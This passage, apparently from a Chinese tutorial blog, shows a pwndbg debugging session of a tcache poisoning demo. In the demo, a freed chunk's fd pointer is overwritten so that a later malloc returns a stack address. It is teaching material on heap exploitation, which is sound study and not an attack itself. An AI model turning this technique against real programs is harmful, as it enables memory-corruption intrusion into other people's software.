class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">):</span> <span class="mi">0x555555756260</span> <span class="err">26</span> <span class="nf">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Now</span> <span class="no">the</span> <span class="no">tcache</span> <span class="no">list</span> <span class="no">has</span> <span class="p">[</span> <span class="nv">%p</span> <span class="p">].</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="err">&amp;</span><span class="no">stack_var</span><span class="p">)</span><span class="c">; </span><span class="c"></span><span class="no">LEGEND</span><span class="p">:</span> <span class="no">STACK</span> <span class="err">|</span> <span class="no">HEAP</span> <span class="err">|</span> <span class="no">CODE</span> <span class="err">|</span> <span class="no">DATA</span> <span class="err">|</span> <span class="no">RWX</span> <span class="err">|</span> <span class="no">RODATA</span> <span class="err">──────────────────────────────────────[</span> <span class="nf">REGISTERS</span> <span class="p">]</span><span class="err">──────────────────────────────────────</span> <span class="nf">RAX</span> <span class="mi">0x20</span> <span class="nf">RBX</span> <span class="mi">0x0</span> <span class="nf">RCX</span> <span class="mi">0x0</span> <span class="nf">RDX</span> <span class="mi">0x7ffff7dd48b0</span> <span class="p">(</span><span class="no">_IO_stdfile_2_lock</span><span class="p">)</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="nf">RDI</span> <span class="mi">0x0</span> <span class="nf">RSI</span> <span class="mi">0x7fffffffb900</span> <span class="err">◂—</span> <span class="mi">0x6c6c616d20747331</span> <span class="p">(</span><span class="err">&#39;</span><span class="mi">1</span><span class="no">st</span> <span class="no">mall</span><span class="err">&#39;</span><span class="p">)</span> <span class="nf">R8</span> <span class="mi">0x7ffff7fd14c0</span> <span class="err">◂—</span> <span class="mi">0x7ffff7fd14c0</span> <span class="nf">R9</span> <span class="mi">0x7fffffffb78c</span> <span class="err">◂—</span> <span class="mi">0x2000000000</span> <span class="nf">R10</span> <span class="mi">0x0</span> <span class="nf">R11</span> <span class="mi">0x246</span> <span class="nf">R12</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="nf">R13</span> <span class="mi">0x7fffffffe0a0</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="nf">R14</span> <span class="mi">0x0</span> <span class="nf">R15</span> <span class="mi">0x0</span> <span class="nf">RBP</span> <span class="mi">0x7fffffffdfc0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="nf">RSP</span> <span class="mi">0x7fffffffdfa0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="nf">RIP</span> <span class="mi">0x55555555489a</span> <span class="p">(</span><span class="no">main</span><span class="err">+</span><span class="mi">320</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x2007bf</span><span class="p">]</span> <span class="err">───────────────────────────────────────[</span> <span class="nf">DISASM</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="err">0</span><span class="nf">x55555555487f</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">293</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x2007da</span><span class="p">]</span> <span class="err">&lt;</span><span class="mi">0x555555755060</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x555555554886</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">300</span><span class="err">&gt;</span> <span class="no">lea</span> <span class="no">rsi</span><span class="p">,</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x2eb</span><span class="p">]</span> <span class="err">0</span><span class="nf">x55555555488d</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">307</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdi</span><span class="p">,</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x555555554890</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">310</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="mi">0</span> <span class="err">0</span><span class="nf">x555555554895</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">315</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">fprintf@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554610</span><span class="err">&gt;</span> <span class="err">►</span> <span class="err">0</span><span class="nf">x55555555489a</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">320</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x2007bf</span><span class="p">]</span> <span class="err">&lt;</span><span class="mi">0x555555755060</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x5555555548a1</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">327</span><span class="err">&gt;</span> <span class="no">lea</span> <span class="no">rdx</span><span class="p">,</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">0x18</span><span class="p">]</span> <span class="err">0</span><span class="nf">x5555555548a5</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">331</span><span class="err">&gt;</span> <span class="no">lea</span> <span class="no">rsi</span><span class="p">,</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x234</span><span class="p">]</span> <span class="err">0</span><span class="nf">x5555555548ac</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">338</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdi</span><span class="p">,</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x5555555548af</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">341</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="mi">0</span> <span class="err">0</span><span class="nf">x5555555548b4</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">346</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">fprintf@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554610</span><span class="err">&gt;</span> <span class="err">────────────────────────────────────[</span> <span class="nf">SOURCE</span> <span class="p">(</span><span class="no">CODE</span><span class="p">)</span> <span class="p">]</span><span class="err">────────────────────────────────────</span> <span class="err">21</span> <span class="nf">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">We</span> <span class="no">overwrite</span> <span class="no">the</span> <span class="no">first</span> <span class="nv">%lu</span> <span class="no">bytes</span> <span class="p">(</span><span class="no">fd</span><span class="err">/</span><span class="no">next</span> <span class="no">pointer</span><span class="p">)</span> <span class="no">of</span> <span class="no">the</span> <span class="no">data</span> <span class="no">at</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span> <span class="err">22</span> <span class="err">&#34;</span><span class="nf">to</span> <span class="no">point</span> <span class="no">to</span> <span class="no">the</span> <span class="no">location</span> <span class="no">to</span> <span class="no">control</span> <span class="p">(</span><span class="nv">%p</span><span class="p">).</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">sizeof</span><span class="p">(</span><span class="no">intptr_t</span><span class="p">),</span> <span class="no">a</span><span class="p">,</span> <span class="err">&amp;</span><span class="no">stack_var</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">23</span> <span class="no">a</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="err">=</span> <span class="p">(</span><span class="no">intptr_t</span><span class="p">)</span><span class="err">&amp;</span><span class="no">stack_var</span><span class="c">; </span><span class="c"></span> <span class="mi">24</span> <span class="mi">25</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="mi">1</span><span class="no">st</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">):</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">))</span><span class="c">; </span><span class="c"></span> <span class="err">►</span> <span class="mi">26</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Now</span> <span class="no">the</span> <span class="no">tcache</span> <span class="no">list</span> <span class="no">has</span> <span class="p">[</span> <span class="nv">%p</span> <span class="p">].</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="err">&amp;</span><span class="no">stack_var</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">27</span> <span class="mi">28</span> <span class="no">intptr_t</span> <span class="p">*</span><span class="no">b</span> <span class="err">=</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">29</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="mi">2</span><span class="no">st</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">):</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">b</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">30</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">We</span> <span class="no">got</span> <span class="no">the</span> <span class="no">control</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">31</span> <span class="err">────────────────────────────────────────</span><span class="p">[</span> <span class="no">STACK</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="err">00:0000│</span> <span class="nf">rsp</span> <span class="mi">0x7fffffffdfa0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">01:0008│</span> <span class="err">0</span><span class="nf">x7fffffffdfa8</span> <span class="err">—▸</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="err">02:0010│</span> <span class="err">0</span><span class="nf">x7fffffffdfb0</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe0a0</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="err">03:0018│</span> <span class="err">0</span><span class="nf">x7fffffffdfb8</span> <span class="err">—▸</span> <span class="mi">0x555555756260</span> <span class="err">—▸</span> <span class="mi">0x7fffffffdfa8</span> <span class="err">—▸</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="err">04:0020│</span> <span class="nf">rbp</span> <span class="mi">0x7fffffffdfc0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="err">05:0028│</span> <span class="err">0</span><span class="nf">x7fffffffdfc8</span> <span class="err">—▸</span> <span class="mi">0x7ffff7a3fa87</span> <span class="p">(</span><span class="no">__libc_start_main</span><span class="err">+</span><span class="mi">231</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">mov</span> <span class="no">edi</span><span class="p">,</span> <span class="no">eax</span> <span class="err">06:0030│</span> <span class="err">0</span><span class="nf">x7fffffffdfd0</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="err">07:0038│</span> <span class="err">0</span><span class="nf">x7fffffffdfd8</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe0a8</span> <span class="err">—▸</span> <span class="mi">0x7fffffffe3c6</span> <span class="err">◂—</span> <span class="mi">0x346d2f656d6f682f</span> <span class="p">(</span><span class="err">&#39;/</span><span class="no">home</span><span class="err">/</span><span class="no">m4</span><span class="err">&#39;</span><span class="p">)</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">heapinfo</span> <span class="err">3886144</span> <span class="err">(0</span><span class="nf">x20</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x30</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x40</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x50</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">3</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x60</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">4</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x70</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">5</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x80</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">6</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x90</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">xa0</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">8</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">xb0</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">9</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="nl">top:</span> <span class="err">0</span><span class="nf">x5555557562e0</span> <span class="p">(</span><span class="no">size</span> <span class="p">:</span> <span class="mi">0x20d20</span><span class="p">)</span> <span class="no">last_remainder</span><span class="p">:</span> <span class="mi">0x0</span> <span class="p">(</span><span class="no">size</span> <span class="p">:</span> <span class="mi">0x0</span><span class="p">)</span> <span class="no">unsortbin</span><span class="p">:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x90</span><span class="p">)</span> <span class="no">tcache_entry</span><span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="mi">0x7fffffffdfa8</span> <span class="p">--</span><span class="err">&gt;</span> <span class="mi">0x555555554650</span> </code></pre></td></tr></table> </div> </div><p>第二次 malloc，即可 malloc 栈上的地址了</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">heapinfo</span> <span class="err">3886144</span> <span class="err">(0</span><span class="nf">x20</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x30</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x40</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x50</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">3</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x60</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">4</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x70</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">5</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x80</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">6</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x90</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">xa0</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">8</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">xb0</span><span class="p">)</span> <span class="no">fastbin</span><span class="p">[</span><span class="mi">9</span><span class="p">]:</span> <span class="mi">0x0</span> <span class="nl">top:</span> <span class="err">0</span><span class="nf">x5555557562e0</span> <span class="p">(</span><span class="no">size</span> <span class="p">:</span> <span class="mi">0x20d20</span><span class="p">)</span> <span class="no">last_remainder</span><span class="p">:</span> <span class="mi">0x0</span> <span class="p">(</span><span class="no">size</span> <span class="p">:</span> <span class="mi">0x0</span><span class="p">)</span> <span class="no">unsortbin</span><span class="p">:</span> <span class="mi">0x0</span> <span class="err">(0</span><span class="nf">x90</span><span class="p">)</span> <span class="no">tcache_entry</span><span class="p">[</span><span class="mi">7</span><span class="p">]:</span> <span class="mi">0x7fffffffdfa8</span> <span class="p">--</span><span class="err">&gt;</span> <span class="mi">0x555555554650</span> <span class="nf">pwndbg</span><span class="err">&gt;</span> <span class="no">ni</span> <span class="err">0</span><span class="nf">x00005555555548c3</span> <span class="mi">28</span> <span class="no">intptr_t</span> <span class="p">*</span><span class="no">b</span> <span class="err">=</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">)</span><span class="c">; </span><span class="c"></span><span class="no">LEGEND</span><span class="p">:</span> <span class="no">STACK</span> <span class="err">|</span> <span class="no">HEAP</span> <span class="err">|</span> <span class="no">CODE</span> <span class="err">|</span> <span class="no">DATA</span> <span class="err">|</span> <span class="no">RWX</span> <span class="err">|</span> <span class="no">RODATA</span> <span class="err">──────────────────────────────────────[</span> <span class="nf">REGISTERS</span> <span class="p">]</span><span class="err">──────────────────────────────────────</span> <span class="nf">RAX</span> <span class="mi">0x7fffffffdfa8</span> <span class="err">—▸</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="nf">RBX</span> <span class="mi">0x0</span> <span class="nf">RCX</span> <span class="mi">0x555555756010</span> <span class="err">◂—</span> <span class="mi">0xff00000000000000</span> <span class="nf">RDX</span> <span class="mi">0x7fffffffdfa8</span> <span class="err">—▸</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="nf">RDI</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="nf">RSI</span> <span class="mi">0x555555756048</span> <span class="err">◂—</span> <span class="mi">0x0</span> <span class="nf">R8</span> <span class="mi">0x7ffff7fd14c0</span> <span class="err">◂—</span> <span class="mi">0x7ffff7fd14c0</span> <span class="nf">R9</span> <span class="mi">0x7fffffffb78c</span> <span class="err">◂—</span> <span class="mi">0x2c00000000</span> <span class="nf">R10</span> <span class="mi">0x0</span> <span class="nf">R11</span> <span class="mi">0x246</span> <span class="nf">R12</span> <span class="mi">0x555555554650</span> <span class="p">(</span><span class="no">_start</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">xor</span> <span class="no">ebp</span><span class="p">,</span> <span class="no">ebp</span> <span class="nf">R13</span> <span class="mi">0x7fffffffe0a0</span> <span class="err">◂—</span> <span class="mi">0x1</span> <span class="nf">R14</span> <span class="mi">0x0</span> <span class="nf">R15</span> <span class="mi">0x0</span> <span class="nf">RBP</span> <span class="mi">0x7fffffffdfc0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="nf">RSP</span> <span class="mi">0x7fffffffdfa0</span> <span class="err">—▸</span> <span class="mi">0x555555554910</span> <span class="p">(</span><span class="no">__libc_csu_init</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">push</span> <span class="no">r15</span> <span class="nf">RIP</span> <span class="mi">0x5555555548c3</span> <span class="p">(</span><span class="no">main</span><span class="err">+</span><span class="mi">361</span><span class="p">)</span> <span class="err">◂—</span> <span class="no">mov</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">0x10</span><span class="p">],</span> <span class="no">rax</span> <span class="err">───────────────────────────────────────[</span> <span class="nf">DISASM</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="err">0</span><span class="nf">x5555555548ac</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">338</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdi</span><span class="p">,</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x5555555548af</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">341</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="mi">0</span> <span class="err">0</span><span class="nf">x5555555548b4</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">346</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">fprintf@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554610</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x5555555548b9</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">351</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">edi</span><span class="p">,</span> <span class="mi">0x80</span> <span class="err">0</span><span class="nf">x5555555548be</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">356</span><span class="err">&gt;</span> <span class="no">call</span> <span class="no">malloc@plt</span> <span class="err">&lt;</span><span class="mi">0x555555554620</span><span class="err">&gt;</span> <span class="err">►</span> <span class="err">0</span><span class="nf">x5555555548c3</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">361</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">0x10</span><span class="p">],</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x5555555548c7</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">365</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rax</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x200792</span><span class="p">]</span> <span class="err">&lt;</span><span class="mi">0x555555755060</span><span class="err">&gt;</span> <span class="err">0</span><span class="nf">x5555555548ce</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">372</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdx</span><span class="p">,</span> <span class="no">qword</span> <span class="no">ptr</span> <span class="p">[</span><span class="no">rbp</span> <span class="p">-</span> <span class="mi">0x10</span><span class="p">]</span> <span class="err">0</span><span class="nf">x5555555548d2</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">376</span><span class="err">&gt;</span> <span class="no">lea</span> <span class="no">rsi</span><span class="p">,</span> <span class="p">[</span><span class="no">rip</span> <span class="err">+</span> <span class="mi">0x2b4</span><span class="p">]</span> <span class="err">0</span><span class="nf">x5555555548d9</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">383</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">rdi</span><span class="p">,</span> <span class="no">rax</span> <span class="err">0</span><span class="nf">x5555555548dc</span> <span class="err">&lt;</span><span class="no">main</span><span class="err">+</span><span class="mi">386</span><span class="err">&gt;</span> <span class="no">mov</span> <span class="no">eax</span><span class="p">,</span> <span class="mi">0</span> <span class="err">────────────────────────────────────[</span> <span class="nf">SOURCE</span> <span class="p">(</span><span class="no">CODE</span><span class="p">)</span> <span class="p">]</span><span class="err">────────────────────────────────────</span> <span class="err">23</span> <span class="nf">a</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="err">=</span> <span class="p">(</span><span class="no">intptr_t</span><span class="p">)</span><span class="err">&amp;</span><span class="no">stack_var</span><span class="c">; </span><span class="c"></span> <span class="mi">24</span> <span class="mi">25</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="mi">1</span><span class="no">st</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">):</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">))</span><span class="c">; </span><span class="c"></span> <span class="mi">26</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">Now</span> <span class="no">the</span> <span class="no">tcache</span> <span class="no">list</span> <span class="no">has</span> <span class="p">[</span> <span class="nv">%p</span> <span class="p">].</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="err">&amp;</span><span class="no">stack_var</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">27</span> <span class="err">►</span> <span class="mi">28</span> <span class="no">intptr_t</span> <span class="p">*</span><span class="no">b</span> <span class="err">=</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">29</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="mi">2</span><span class="no">st</span> <span class="no">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">):</span> <span class="nv">%p</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">,</span> <span class="no">b</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">30</span> <span class="no">fprintf</span><span class="p">(</span><span class="no">stderr</span><span class="p">,</span> <span class="err">&#34;</span><span class="no">We</span> <span class="no">got</span> <span class="no">the</span> <span class="no">control</span><span class="err">\</span><span class="no">n</span><span class="err">&#34;</span><span class="p">)</span><span class="c">; </span><span class="c"></span> <span class="mi">31</span> <span class="mi">32</span> <span class="no">return</span> <span class="mi">0</span><span class="c">; </span><span class="c"></span> <span class="mi">33</span> <span class="err">}</span> <span class="err">────────────────────────────────────────[</span> <span class="nf">STACK</span> <span class="p">]</span><span class="err">────────────────────────────────────────</span> <span class="err">00:0000│</span> 